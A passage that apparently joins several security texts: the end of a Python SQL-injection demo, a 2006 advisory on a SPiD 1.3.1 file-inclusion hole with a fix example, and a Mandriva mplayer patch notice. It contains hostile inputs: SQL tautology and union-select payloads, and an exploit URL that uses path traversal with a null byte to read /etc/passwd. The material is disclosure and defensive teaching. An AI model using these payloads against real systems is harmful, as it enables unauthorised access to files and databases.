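NEWSID_RE = re.compile(r"\A[0-9]{1,9}\Z")


def parse_newsid(raw):
    """Allow-list check for newsid: only a short decimal integer is accepted.
    Anything carrying SQL (spaces, quotes, keywords) is rejected before it can
    reach a query, and the caller still binds the int as a parameter."""
    if not isinstance(raw, str) or not NEWSID_RE.match(raw):
        return None
    return int(raw)


if __name__ == "__main__":
    db = make_db()
    tautology = "' or '1'='1"
    print("concat login with tautology password:", login_concat(db, "any", tautology))
    print("param  login with tautology password:", login_param(db, "any", tautology))
    print("newsid '11' ->", parse_newsid("11"))
    print("newsid '11 union select ...' ->", parse_newsid("11 union select 0,userpassword"))
```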



NSA Group Security Advisory NSAG-№201-25.02.2006 Vulnerability SPiD v1.3.1

2006-02-25 Thread NSA Group
Advisory:
NSAG-№201-25.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product:
SPiD v1.3.1


Site of manufacturer:
http://spid.adnx.net/

The status: 
19/01/2006 - Publication is postponed.
14/02/2006 - Answer of the manufacturer is absent.
25/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/955.html

Risk: 
Hide

Description: 
Attacker can form the query in URL form and get the access to the
system files.

Vulnerability code:
+++
if (isset($_REQUEST["lang"])) {
    $file_lang = $lang_path . "lang_" . $_REQUEST["lang"] . ".php";
    if (file_exists($file_lang)){
        include $lang_path . "lang.php";
        include $file_lang;
        // ... rest of the block skipped
+++

Exploit: 
http://example.com/spiddir/scan_lang_insert.php?lang=../../../../../../../../etc/passwd%00

More information:
http://www.nsag.ru/vuln/955.html

++


www.nsag.ru 
«Nemesis» © 2006 
 
Nemesis Security Audit Group © 2006.
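
The SPiD fragment quoted above builds an include path straight from the lang request parameter, so a traversal sequence with a trailing null byte can make file_exists() and include pick a file outside the language directory. The Python function below is an added example of the defensive counterpart and is not SPiD's code: it accepts only an allow-listed language code, rejects embedded NUL bytes, and confirms the resolved path stays under the language directory before reporting it. The fixture directory, file names and the LANG_RE pattern are assumptions constructed for the example.

```python
import os
import re
import tempfile

# Allow-list for language codes: "en" or "en_US" shapes only, nothing else.
LANG_RE = re.compile(r"\A[a-z]{2}(?:_[A-Z]{2})?\Z")


def resolve_lang_file(lang_path: str, lang):
    """Return the absolute path of lang_<lang>.php inside lang_path, or None.

    None means: not a string, contains a NUL byte, not an allow-listed code,
    resolves outside lang_path, or the file does not exist. Only a non-None
    result should ever be handed to include()."""
    if not isinstance(lang, str) or "\x00" in lang or not LANG_RE.match(lang):
        return None
    base = os.path.realpath(lang_path)
    candidate = os.path.realpath(os.path.join(base, f"lang_{lang}.php"))
    # Containment check: realpath() has already collapsed any '..' segments.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None


def make_demo_dir() -> str:
    """Constructed fixture: a temp directory holding lang.php and lang_en.php."""
    d = tempfile.mkdtemp(prefix="spid_lang_")
    for name in ("lang.php", "lang_en.php"):
        with open(os.path.join(d, name), "w") as f:
            f.write("<?php // constructed fixture file\n")
    return d


if __name__ == "__main__":
    d = make_demo_dir()
    for value in ("en", "fr", "../../../../../../../../etc/passwd\x00", "en\x00", "../lang_en"):
        print(repr(value), "->", resolve_lang_file(d, value))
```

The regex alone already rejects the traversal string; the NUL-byte and containment checks are kept as independent layers so that a later relaxation of the allow-list (for example to permit longer locale names) does not silently reopen the path.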




[ MDKSA-2005:048 ] - Updated mplayer packages fix integer overflow vulnerabilities

2006-02-25 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2005:048
 http://www.mandriva.com/security/
 ___
 
 Package : mplayer
 Date: February 24, 2005
 Affected: 2006.0, Corporate 3.0
 ___
 
 Problem Description:
 
 Multiple integer overflows in (1) the new_demux_packet function in
 demuxer.h and (2) the demux_asf_read_packet function in demux_asf.c in
 MPlayer 1.0pre7try2 and earlier allow remote attackers to execute
 arbitrary code via an ASF file with a large packet length value.
 
 The updated packages have been patched to prevent this problem.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0579
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 6a9787d26d2b82697525ea3ce1a42528  
2006.0/RPMS/libdha1.0-1.0-1.pre7.12.2.20060mdk.i586.rpm
 2cee96ab48d748bd5c218c6b72762a69  
2006.0/RPMS/libpostproc0-1.0-1.pre7.12.2.20060mdk.i586.rpm
 7d85bd28f30c98b2c4da1fb27935  
2006.0/RPMS/libpostproc0-devel-1.0-1.pre7.12.2.20060mdk.i586.rpm
 eeaae4efea7c733946468504c0847c6e  
2006.0/RPMS/mencoder-1.0-1.pre7.12.2.20060mdk.i586.rpm
 a3e1114604c50095b4a00e3e2546fad4  
2006.0/RPMS/mplayer-1.0-1.pre7.12.2.20060mdk.i586.rpm
 7c1d40d98a7c63b84836f17742424572  
2006.0/RPMS/mplayer-gui-1.0-1.pre7.12.2.20060mdk.i586.rpm
 0ae9253d37d09e4e015c0dbea3e3238b  
2006.0/SRPMS/mplayer-1.0-1.pre7.12.2.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 083cd368b22c862c3ad4e3c6809373ba  
x86_64/2006.0/RPMS/lib64postproc0-1.0-1.pre7.12.2.20060mdk.x86_64.rpm
 f6764f327bc34aea319211a1ba848d46  
x86_64/2006.0/RPMS/lib64postproc0-devel-1.0-1.pre7.12.2.20060mdk.x86_64.rpm
 7cd2b81fe303956e07ead2be2ce40d01  
x86_64/2006.0/RPMS/mencoder-1.0-1.pre7.12.2.20060mdk.x86_64.rpm
 9962424187f6d7f99f91d65b22e62eea  
x86_64/2006.0/RPMS/mplayer-1.0-1.pre7.12.2.20060mdk.x86_64.rpm
 fc4d22d72852405516379f36249626ae  
x86_64/2006.0/RPMS/mplayer-gui-1.0-1.pre7.12.2.20060mdk.x86_64.rpm
 0ae9253d37d09e4e015c0dbea3e3238b  
x86_64/2006.0/SRPMS/mplayer-1.0-1.pre7.12.2.20060mdk.src.rpm

 Corporate 3.0:
 79227923f532fd0d481b6a8999a48fb6  
corporate/3.0/RPMS/libdha0.1-1.0-0.pre3.14.6.C30mdk.i586.rpm
 8239e565804440e9b5f33dab590825c4  
corporate/3.0/RPMS/libpostproc0-1.0-0.pre3.14.6.C30mdk.i586.rpm
 b92ecaf616a975c840fd2d8d1640141b  
corporate/3.0/RPMS/libpostproc0-devel-1.0-0.pre3.14.6.C30mdk.i586.rpm
 1a5c6dba5378d086e76ec1c05f5fe416  
corporate/3.0/RPMS/mencoder-1.0-0.pre3.14.6.C30mdk.i586.rpm
 5d264152c0c2934f45c14576e3094a9d  
corporate/3.0/RPMS/mplayer-1.0-0.pre3.14.6.C30mdk.i586.rpm
 74c1e627dd747a52181e49502fa404b6  
corporate/3.0/RPMS/mplayer-gui-1.0-0.pre3.14.6.C30mdk.i586.rpm
 7ea541987b4b2285112e6c822704b797  
corporate/3.0/SRPMS/mplayer-1.0-0.pre3.14.6.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 49ab3887057e1a407e85b09cea56d977  
x86_64/corporate/3.0/RPMS/lib64postproc0-1.0-0.pre3.14.6.C30mdk.x86_64.rpm
 3e8fdbfc03ba3bdbba4a31c52b8a6770  
x86_64/corporate/3.0/RPMS/lib64postproc0-devel-1.0-0.pre3.14.6.C30mdk.x86_64.rpm
 8d45d891ed90b1576acbc512f035f9bf  
x86_64/corporate/3.0/RPMS/mencoder-1.0-0.pre3.14.6.C30mdk.x86_64.rpm
 2236312827cad9d6490340a9e7c66f6d  
x86_64/corporate/3.0/RPMS/mplayer-1.0-0.pre3.14.6.C30mdk.x86_64.rpm
 803888f3129e969e1351ce6ce8a88d59  
x86_64/corporate/3.0/RPMS/mplayer-gui-1.0-0.pre3.14.6.C30mdk.x86_64.rpm
 7ea541987b4b2285112e6c822704b797  
x86_64/corporate/3.0/SRPMS/mplayer-1.0-0.pre3.14.6.C30mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFD/3SJmqjQ0CJFipgRAppdAJwMKNiyvLVH+QXkX5IOMRvGzhA8iACfawcl
4MpPnK4igEjRxRY2ODPNZdg=
=LcLq
-END PGP SIGNATURE-